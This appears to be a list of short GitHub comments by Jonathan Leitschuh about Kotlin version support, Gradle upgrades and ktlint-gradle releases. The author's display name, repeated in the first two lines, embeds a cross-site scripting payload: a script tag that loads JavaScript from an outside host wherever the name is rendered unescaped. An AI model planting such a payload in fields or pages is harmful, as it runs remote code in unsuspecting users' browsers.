Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Not currently, but I figure at this point it would be safe to do so as Kotlin 1.3 is pretty EOL as of 2 years ago: https://endoflife.date/kotlin
Also, this library currently supports Kotlin versions 1.3 and above, so it would now be safe to add: https://github.com/junit-team/junit5/blob/e188b1eae321866f8fe87c9736f8c5d6e41cba24/gradle/plugins/common/src/main/kotlin/junitbuild.kotlin-library-conventions.gradle.kts#L8-L14 If someone wants to open a pull request to add support...
As you suggested, I would use the compiler as your validation
I generally prefer "more correct" but that breaks things potentially, over "broken/incorrect" but stable. Principle of least surprise for new users.
> You can update to Gradle 8 or 7.6 to support Java 19. That's the plan. But things are breaking, and I don't have the time to figure out what's...
The most useful thing for us at this point is if someone could contribute a pull request with a failing unit test demonstrating the problem. From there, we can dig...
Just to clarify with everyone, with this plugin, we don't implement the `PatternFilterable` that you are calling `exclude` on. We just support the API and directly pass it to the...
https://github.com/JLLeitschuh/ktlint-gradle/releases/tag/v11.1.0
@gabitheiss please open a new issue and include a stack trace